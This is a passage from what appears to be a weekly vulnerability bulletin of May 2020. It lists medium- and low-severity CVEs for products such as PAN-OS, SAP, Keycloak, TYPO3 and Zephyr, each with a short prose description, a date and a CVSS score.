  ** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE. 2020-05-10 5 CVE-2020-9315
FULLDISC
MISC
MISC
MISC palo_alto_networks -- pan-os
  The GlobalProtect Portal feature in PAN-OS does not set a new session identifier after a successful user login, which allows session fixation attacks, if an attacker is able to control a user's session ID. This issue affects: All PAN-OS 7.1 and 8.0 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.8. 2020-05-13 5.5 CVE-2020-1993
CONFIRM palo_alto_networks -- pan-os
  A cross-site scripting (XSS) vulnerability exists when visiting malicious websites with the Palo Alto Networks GlobalProtect Clientless VPN that can compromise the user's active session. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; All versions of PAN-OS 8.0. 2020-05-13 4.3 CVE-2020-2005
CONFIRM palo_alto_networks -- pan-os
  A NULL pointer dereference vulnerability in Palo Alto Networks PAN-OS allows an authenticated administrator to send a request that causes the rasmgr daemon to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue affects: PAN-OS 9.1 versions earlier than 9.1.2. 2020-05-13 6.8 CVE-2020-1995
CONFIRM palo_alto_networks -- pan-os_for_panorama
  Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system. This issue affects: All versions of PAN-OS for Panorama 7.1 and 8.0; PAN-OS for Panorama 8.1 versions earlier than 8.1.13; PAN-OS for Panorama 9.0 versions earlier than 9.0.7. 2020-05-13 5 CVE-2020-2012
CONFIRM

palo_alto_networks -- pan-os

A DOM-Based Cross Site Scripting Vulnerability exists in PAN-OS and Panorama Management Web Interfaces. A remote attacker able to convince an authenticated administrator to click on a crafted link to PAN-OS and Panorama Web Interfaces could execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0. 2020-05-13 4.3 CVE-2020-2017
CONFIRM pixel_&_tonic -- craft_cms
  In the SEOmatic plugin before 3.2.49 for Craft CMS, helpers/DynamicMeta.php does not properly sanitize the URL. This leads to Server-Side Template Injection and credentials disclosure via a crafted Twig template after a semicolon. 2020-05-11 5 CVE-2020-12790
MISC
MISC
MISC
MISC plex -- media_server
  Deserialization of Untrusted Data in Plex Media Server on Windows allows a remote, authenticated attacker to execute arbitrary Python code. 2020-05-08 6.5 CVE-2020-5741
MISC python_packaging_authority -- python_package_installer
  An issue was discovered in pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index. This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). 2020-05-08 6.8 CVE-2018-20225
MISC
MISC red_hat -- ansible_engine
  A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the bind_pw in the parameters field. The highest threat from this vulnerability is data confidentiality. 2020-05-12 5 CVE-2020-1746
CONFIRM
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in the reset credential flow in all Keycloak versions before 8.0.0. This flaw allows an attacker to gain unauthorized access to the application. 2020-05-12 6.5 CVE-2020-1718
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 9.0.2. This flaw allows a malicious user that is currently logged in, to see the personal information of a previously logged out user in the account manager section. 2020-05-11 4 CVE-2020-1724
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user. 2020-05-08 6.5 CVE-2019-10170
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak before version 11.0.0, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution. 2020-05-13 6.5 CVE-2020-1714
CONFIRM
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak’s user-managed access interface, where it would permit a script to be set in the UMA policy. This flaw allows an authenticated attacker with UMA permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the user running the application. 2020-05-08 6.5 CVE-2019-10169
CONFIRM red_hat -- openshift_container_platform
  A flaw was found in OpenShift Container Platform where OAuth tokens are not encrypted when the encryption of data at rest is enabled. This flaw allows an attacker with access to a backup to obtain OAuth tokens and then use them to log into the cluster as any user who logged into the cluster via the WebUI or via the command line in the last 24 hours. Once the backup is older than 24 hours the OAuth tokens are no longer valid. 2020-05-12 4.6 CVE-2020-10706
CONFIRM ruby_on_rails -- active_resource
  There is a possible information disclosure issue in Active Resource <v5.1.1 that could allow an attacker to create specially crafted requests to access data in an unexpected way and possibly leak information. 2020-05-12 5 CVE-2020-8151
MISC

samsung -- multiple_mobile_devices

An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and designate a different preferred SIM card. The Samsung ID is SVE-2020-16594 (May 2020). 2020-05-11 5 CVE-2020-12748
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) via SPEN. The Samsung ID is SVE-2020-17019 (May 2020). 2020-05-11 5 CVE-2020-12750
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) software. The Quram image codec library allows attackers to overwrite memory and execute arbitrary code via crafted JPEG data that is mishandled during decoding. The Samsung ID is SVE-2020-16943 (May 2020). 2020-05-11 6.8 CVE-2020-12751
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (with TEEGRIS) software. Attackers can determine user credentials via a brute-force attack against the Gatekeeper trustlet. The Samsung ID is SVE-2020-16908 (May 2020). 2020-05-11 5 CVE-2020-12752
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with P(9.0) (Exynos chipsets) software. The S.LSI Wi-Fi drivers have a buffer overflow. The Samsung ID is SVE-2020-16906 (May 2020). 2020-05-11 4.6 CVE-2020-12749
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and access clipboard content via USSD. The Samsung ID is SVE-2019-16556 (May 2020). 2020-05-11 5 CVE-2020-12745
CONFIRM

sap -- adaptive_server_enterprise

SAP Adaptive Server Enterprise (Backup Server), version 16.0, does not perform the necessary validation checks for an authenticated user while executing DUMP or LOAD command allowing arbitrary code execution or Code Injection. 2020-05-12 6.5 CVE-2020-6248
MISC
MISC

sap -- adaptive_server_enterprise

Under certain conditions, SAP Adaptive Server Enterprise (Web Services), versions 15.7, 16.0, allows an authenticated user to execute crafted database queries to elevate their privileges, modify database objects, or execute commands they are not otherwise authorized to execute, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6253
MISC
MISC

sap -- adaptive_server_enterprise

Under certain conditions, SAP Adaptive Server Enterprise (XP Server on Windows Platform), versions 15.7, 16.0, does not perform the necessary checks for an authenticated user while executing the extended stored procedure, allowing an attacker to read, modify, delete restricted data on connected servers, leading to Code Injection. 2020-05-12 6.5 CVE-2020-6243
MISC
MISC sap -- adaptive_server_enterprise
  SAP Adaptive Server Enterprise, version 16.0, allows an authenticated attacker to exploit certain misconfigured endpoints exposed over the adjacent network, to read the system administrator password, leading to Information Disclosure. This could help the attacker to read/write any data and even stop the server like an administrator. 2020-05-12 6.7 CVE-2020-6250
MISC
MISC sap -- adaptive_server_enterprise
  Under certain conditions SAP Adaptive Server Enterprise, versions 15.7, 16.0, allows an attacker to access information which would otherwise be restricted leading to Missing Authorization Check. 2020-05-12 4 CVE-2020-6259
MISC
MISC sap -- adaptive_server_enterprise
  Under certain conditions SAP Adaptive Server Enterprise (Cockpit), version 16.0, allows an attacker with access to local network, to get sensitive and confidential information, leading to Information Disclosure. It can be used to get user account credentials, tamper with system data and impact system availability. 2020-05-12 5.2 CVE-2020-6252
MISC
MISC sap -- adaptive_server_enterprise
  SAP Adaptive Server Enterprise, version 16.0, allows an authenticated user to execute crafted database queries to elevate privileges of users in the system, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6241
MISC
MISC sap -- application_server_abap
  Service Data Download in SAP Application Server ABAP (ST-PI, before versions 2008_1_46C, 2008_1_620, 2008_1_640, 2008_1_700, 2008_1_710, 740) allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behavior of the application and the whole ABAP system leading to Code Injection. 2020-05-12 6.5 CVE-2020-6262
MISC
MISC sap -- business_objects_intelligence_platform
  SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker with access to local instance, to inject file or code that can be executed by the application due to Improper Control of Resource Identifiers. 2020-05-12 4.6 CVE-2020-6245
MISC
MISC sap -- business_objects_intelligence_platform
  SAP Business Objects Business Intelligence Platform, version 4.2, allows an unauthenticated attacker to prevent legitimate users from accessing a service. Using a specially crafted request, the attacker can crash or flood the Central Management Server, thereby impacting system availability. 2020-05-12 5 CVE-2020-6247
MISC
MISC sap -- business_objects_intelligence_platform
  Under certain conditions or error scenarios SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker to access information which would otherwise be restricted. 2020-05-12 5 CVE-2020-6251
MISC
MISC sap -- enterprise_threat_detection
  SAP Enterprise Threat Detection, versions 1.0, 2.0, does not sufficiently encode error response pages in case of errors, allowing XSS payload reflecting in the response, leading to reflected Cross Site Scripting. 2020-05-12 4.3 CVE-2020-6254
MISC
MISC sap -- identity_management
  SAP Identity Management, version 8.0, does not perform necessary authorization checks for an authenticated user, allowing the attacker to view certain sensitive information of the victim, leading to Missing Authorization Check. 2020-05-12 4 CVE-2020-6258
MISC
MISC sap -- master_data_governance
  The use of an admin backend report within SAP Master Data Governance, versions - S4CORE 101, S4FND 102, 103, 104, SAP_BS_FND 748; allows an attacker to execute crafted database queries, exposing the backend database, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6249
MISC
MISC sap -- master_data_governance
  SAP Master Data Governance, versions - 748, 749, 750, 751, 752, 800, 801, 802, 803, 804, allows users to display change request details without having required authorizations, due to Missing Authorization Check. 2020-05-12 4 CVE-2020-6256
MISC
MISC sap -- netweaver_as_abap
  SAP NetWeaver AS ABAP (Web Dynpro ABAP), versions (SAP_UI 750, 752, 753, 754 and SAP_BASIS 700, 710, 730, 731, 804) allows an unauthenticated attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service, leading to Denial of Service. 2020-05-12 5 CVE-2020-6240
MISC
MISC six_apart -- multiple_movable_type_products
  Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allow remote authenticated attackers to upload arbitrary files and execute a php script via unspecified vectors. 2020-05-14 6.5 CVE-2020-5577
MISC
MISC six_apart -- multiple_movable_type_products
  Cross-site scripting vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors. 2020-05-14 4.3 CVE-2020-5575
MISC
MISC six_apart -- multiple_movable_type_products
  HTML attribute value injection vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary HTML attribute value via unspecified vectors. 2020-05-14 5 CVE-2020-5574
MISC
MISC six_apart -- multiple_movable_type_products
  Cross-site request forgery (CSRF) vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2020-05-14 6.8 CVE-2020-5576
MISC
MISC solis_miolo -- solis_miolo
  Solis Miolo 2.0 allows index.php?module=install&action=view&item= Directory Traversal. 2020-05-09 5 CVE-2020-12765
CONFIRM suse -- opensuse
  An Improper Neutralization of Input During Web Page Generation vulnerability in open-build-service allows remote attackers to store arbitrary JS code to cause XSS. This issue affects: openSUSE open-build-service versions prior to 7cc32c8e2ff7290698e101d9a80a9dc29a5500fb. 2020-05-13 4.3 CVE-2020-8020
CONFIRM symantec -- endpoint_protection
  Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege. 2020-05-11 4.6 CVE-2020-5837
MISC symantec -- endpoint_protection
  Symantec Endpoint Protection, prior to 14.3, can potentially reset the ACLs on a file as a limited user while Symantec Endpoint Protection's Tamper Protection feature is disabled. 2020-05-11 4.4 CVE-2020-5836
MISC symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to a directory traversal attack that could allow a remote actor to determine the size of files in the directory. 2020-05-11 5 CVE-2020-5834
MISC symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, has a race condition in client remote deployment which may result in an elevation of privilege on the remote machine. 2020-05-11 4.4 CVE-2020-5835
MISC tobesoft -- xplatform
  A use-after-free vulnerability in the TOBESOFT XPLATFORM versions 9.1 to 9.2.2 may lead to code execution on a system running it. 2020-05-11 6.8 CVE-2019-19162
MISC transmission -- transmission
  Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file. 2020-05-15 6.8 CVE-2018-10756
MISC
MISC tyler_technologies -- eagle
  TylerTech Eagle 2018.3.11 deserializes untrusted user input, resulting in remote code execution via a crafted Java object to the recorder/ServiceManager?service=tyler.empire.settings.SettingManager URI. 2020-05-13 6.5 CVE-2019-16112
MISC

typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query. 2020-05-13 4 CVE-2020-12700
MISC
CONFIRM typo3 -- typo3
  In TYPO3 CMS versions 10.4.0 and 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2. 2020-05-13 4.3 CVE-2020-11063
CONFIRM typo3 -- typo3
  In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victim's user session. In a worst-case scenario, new admin users can be created which can directly be used by an attacker. The vulnerability is basically a cross-site request forgery (CSRF) triggered by a cross-site scripting vulnerability (XSS), but it happens on the same target host; thus, it is actually a same-site request forgery. Malicious payload such as HTML containing JavaScript might be provided by either an authenticated backend user or by a non-authenticated user using a third party extension, e.g. file upload in a contact form with knowledge of the target location. To be successful, the attacked victim requires an active and valid backend or install tool user session at the time of the attack. This has been fixed in 9.5.17 and 10.4.2. The deployment of additional mitigation techniques is suggested as described below.
  - Sudo Mode Extension: This TYPO3 extension intercepts modifications to security relevant database tables, e.g. those storing user accounts or storages of the file abstraction layer. Modifications need to be confirmed again by the acting user providing their password again. This technique is known as sudo mode. This way, unintended actions happening in the background can be mitigated. See https://github.com/FriendsOfTYPO3/sudo-mode and https://extensions.typo3.org/extension/sudo_mode
  - Content Security Policy: Content Security Policies tell (modern) browsers how resources served by a particular site are handled. It is also possible to disallow script executions for specific locations. In a TYPO3 context, it is suggested to disallow direct script execution at least for locations /fileadmin/ and /uploads/.
  2020-05-14 6.8 CVE-2020-11069
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the web site (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects. This has been fixed in 9.5.17 and 10.4.2. 2020-05-14 6.4 CVE-2020-11066
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries. 2020-05-13 5 CVE-2020-12697
MISC
CONFIRM typo3 -- typo3
  In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2. 2020-05-14 6 CVE-2020-11067
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 has Broken Access Control for newsletter subscriber tables. 2020-05-13 4 CVE-2020-12698
MISC
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl. 2020-05-13 5.8 CVE-2020-12699
MISC
CONFIRM veritas -- aptare
  Veritas APTARE versions prior to 10.4 did not perform adequate authorization checks. An authenticated user could gain unauthorized access to sensitive information or functionality by manipulating specific parameters within the application. 2020-05-14 6.5 CVE-2020-12875
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 allowed remote users to access several unintended files on the server. This vulnerability only impacts Windows server deployments. 2020-05-14 5 CVE-2020-12876
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 allowed sensitive information to be accessible without authentication. 2020-05-14 5 CVE-2020-12877
MISC vmware -- pivotal_concourse
  Pivotal Concourse, most versions prior to 6.0.0, allows redirects to untrusted websites in its login flow. A remote unauthenticated attacker could convince a user to click on a link using the OAuth redirect link with an untrusted website and gain access to that user's access token in Concourse. (This issue is similar to, but distinct from, CVE-2018-15798.) 2020-05-14 5.8 CVE-2020-5409
CONFIRM vmware -- spring_security
  Spring Security versions 5.2.x prior to 5.2.4 and 5.3.x prior to 5.3.2 contain a signature wrapping vulnerability during SAML response validation. When using the spring-security-saml2-service-provider component, a malicious user can carefully modify an otherwise valid SAML response and append an arbitrary assertion that Spring Security will accept as valid. 2020-05-13 6.5 CVE-2020-5407
MLIST
CONFIRM western_digital -- mycloud_home
  The Western Digital WD Discovery application before 3.8.229 for MyCloud Home on Windows and macOS is vulnerable to CSRF, with impacts such as stealing data, modifying disk contents, or exhausting disk space. 2020-05-13 6.8 CVE-2020-12427
MISC
CONFIRM wso2 -- multiple_products
  XXE during an EventPublisher update can occur in Management Console in WSO2 API Manager 3.0.0 and earlier, API Manager Analytics 2.5.0 and earlier, API Microgateway 2.2.0, Enterprise Integrator 6.4.0 and earlier, IS as Key Manager 5.9.0 and earlier, Identity Server 5.9.0 and earlier, and Identity Server Analytics 5.6.0 and earlier. 2020-05-08 6.5 CVE-2020-12719
MISC zephyrproject -- zephyr
  Multiple syscalls in the Kscan subsystem perform insufficient argument validation, allowing code executing in userspace to potentially gain elevated privileges. See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10058
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  Out-of-bounds Write in the USB Mass Storage memoryWrite handler with unaligned Sizes See NCC-ZEP-024, NCC-ZEP-025, NCC-ZEP-026 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10021
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The UpdateHub module disables DTLS peer checking, which allows for a man in the middle attack. This is mitigated by firmware images requiring valid signatures. However, there is no benefit to using DTLS without the peer checking. See NCC-ZEP-018 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. 2020-05-11 5.8 CVE-2020-10059
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The shell subsystem contains a buffer overflow, whereby an adversary with physical access to the device is able to cause a memory corruption, resulting in denial of service or possibly code execution within the Zephyr kernel. See NCC-NCC-019 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10023
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  In updatehub_probe, right after JSON parsing is complete, objects[1] is accessed from the output structure in two different places. If the JSON contained fewer than two elements, this access would reference uninitialized stack memory. This could result in a crash, denial of service, or possibly an information leak. Recommend disabling updatehub until such a time as a fix can be made available. Provided the fix in CVE-2020-10059 is applied, the attack requires compromise of the server. See NCC-ZEP-030 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. version 2.2.0 and later versions. 2020-05-11 5.5 CVE-2020-10060
MISC
MISC zephyrproject -- zephyr
  Multiple syscalls with insufficient argument validation See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10028
MISC
MISC
MISC
MISC
MISC zoho -- manageengine_datasecurity_plus
  The DataEngine Xnode Server application in Zoho ManageEngine DataSecurity Plus prior to 6.0.1 does not validate the database schema name when handling a DR-SCHEMA-SYNC request. This allows an authenticated attacker to execute code in the context of the product by writing a JSP file to the webroot directory via directory traversal. 2020-05-08 6.5 CVE-2020-11531
MISC
MISC

Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

covidsafe -- covidsafe_for_ios
  The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected. 2020-05-14 3.3 CVE-2020-12717
MISC freerdp -- freerdp
  In FreeRDP after 1.1 and before 2.0.0, a stream out-of-bounds seek in rdp_read_font_capability_set could lead to a later out-of-bounds read. As a result, a manipulated client or server might force a disconnect due to an invalid data read. This has been fixed in 2.0.0. 2020-05-12 3.5 CVE-2020-11058
MISC
MISC
CONFIRM glpi_project -- glpi
  In GLPI after 0.68.1 and before 9.4.6, multiple reflexive XSS occur in Dropdown endpoints due to an invalid Content-Type. This has been fixed in version 9.4.6. 2020-05-12 3.5 CVE-2020-11062
MISC
CONFIRM

google -- android
  In onShowingStateChanged of KeyguardStateMonitor.java, there is a possible inappropriate read due to a logic error. This could lead to local information disclosure of keyguard-protected data with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9 Android-10. Android ID: A-144430870. 2020-05-14 2.1 CVE-2020-0104
MISC google -- android
  In getCellLocation of PhoneInterfaceManager.java, there is a possible permission bypass due to a missing SDK version check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-148414207. 2020-05-14 2.1 CVE-2020-0106
MISC google -- android
  In BnCrypto::onTransact of ICrypto.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-144767096. 2020-05-14 2.1 CVE-2020-0101
MISC ibm -- api_connect
  IBM API Connect V2018.4.1.0 through 2018.4.1.10 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 174859. 2020-05-12 3.5 CVE-2020-4195
XF
CONFIRM kde -- kde
  fishProtocol::establishConnection in fish/fish.cpp in KDE kio-extras through 20.04.0 makes a cacheAuthentication call even if the user had not set the keepPassword option. This may lead to unintended KWallet storage of a password. 2020-05-09 2.1 CVE-2020-12755
CONFIRM linux -- linux_kernel
  An issue was discovered in the Linux kernel before 5.6. svm_cpu_uninit in arch/x86/kvm/svm.c has a memory leak, aka CID-d80b64ff297e. 2020-05-09 2.1 CVE-2020-12768
CONFIRM
CONFIRM nextcloud -- nextcloud_server
  An outdated 3rd party library in the Files PDF viewer for Nextcloud Server 18.0.2 caused a Cross-site scripting vulnerability when opening a malicious PDF. 2020-05-12 3.5 CVE-2020-8155
SUSE
SUSE
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC’s firmware files’ signatures are not verified upon firmware update. This allows an attacker to replace legitimate firmware files with malicious files. 2020-05-14 3.5 CVE-2020-12046
MISC palo_alto_networks -- globalprotect_app
  Under certain circumstances a user's password may be logged in cleartext in the PanGPS.log diagnostic file when logs are collected for troubleshooting on GlobalProtect app (also known as GlobalProtect Agent) for MacOS and Windows. For this issue to occur all of these conditions must be true: (1) 'Save User Credential' option should be set to 'Yes' in the GlobalProtect Portal's Agent configuration, (2) the GlobalProtect user manually selects a gateway, (3) and the logging level is set to 'Dump' while collecting troubleshooting logs. This issue does not affect GlobalProtect app on other platforms (for example iOS/Android/Linux). This issue affects GlobalProtect app 5.0 versions earlier than 5.0.9, GlobalProtect app 5.1 versions earlier than 5.1.2 on Windows or MacOS. Since becoming aware of the issue, Palo Alto Networks has safely deleted all the known GlobalProtectLogs zip files sent by customers with the credentials. We now filter and remove these credentials from all files sent to Customer Support. The GlobalProtectLogs zip files uploaded to Palo Alto Networks systems were only accessible by authorized personnel with valid Palo Alto Networks credentials. We do not have any evidence of malicious access or use of these credentials. 2020-05-13 1.7 CVE-2020-2004
CONFIRM php-fusion -- php-fusion
  In administration/comments.php in PHP-Fusion 9.03.50, an authenticated attacker can take advantage of a stored XSS vulnerability in the Preview Comment feature. The protection mechanism can be bypassed by using HTML event handlers such as ontoggle. 2020-05-08 3.5 CVE-2020-12718
MISC red_hat -- jboss_keycloak
  A flaw was found in keycloak in versions before 9.0.0. A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality. 2020-05-11 2.1 CVE-2020-1698
CONFIRM samsung -- multiple_mobile_devices
  Some Broadcom chips mishandle Bluetooth random-number generation because a low-entropy Pseudo Random Number Generator (PRNG) is used in situations where a Hardware Random Number Generator (HRNG) should have been used to prevent spoofing. This affects, for example, Samsung Galaxy S8, S8+, and Note8 devices with the BCM4361 chipset. The Samsung ID is SVE-2020-16882 (May 2020). 2020-05-08 3.3 CVE-2020-6616
MISC
MISC
MISC
CONFIRM
MISC
MISC

sap -- business_objects_business_intelligence_platform
  SAP Business Objects Business Intelligence Platform (CMC and BI Launchpad) 4.2 does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. 2020-05-12 3.5 CVE-2020-6257
MISC
MISC shopizer -- shopizer
  In Shopizer before version 2.11.0, a script can be injected in various forms and saved in the database, then executed when information is fetched from backend. This has been patched in version 2.11.0. 2020-05-08 3.5 CVE-2020-11006
MISC
CONFIRM symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to an out of bounds vulnerability, which is a type of issue that results in an existing application reading memory outside of the bounds of the memory that had been allocated to the program. 2020-05-11 2.1 CVE-2020-5833
MISC symantec -- it_analytics
  Symantec IT Analytics, prior to 2.9.1, may be susceptible to a cross-site scripting (XSS) exploit, which is a type of issue that can potentially enable attackers to inject client-side scripts into web pages viewed by other users. 2020-05-13 3.5 CVE-2020-5838
MISC techsmith -- snagit
  In TechSmith SnagIt 11.2.1 through 20.0.3, an XML External Entity (XXE) injection issue exists that would allow a local attacker to exfiltrate data under the local Administrator account. 2020-05-08 2.1 CVE-2020-11541
CONFIRM typo3 -- typo3
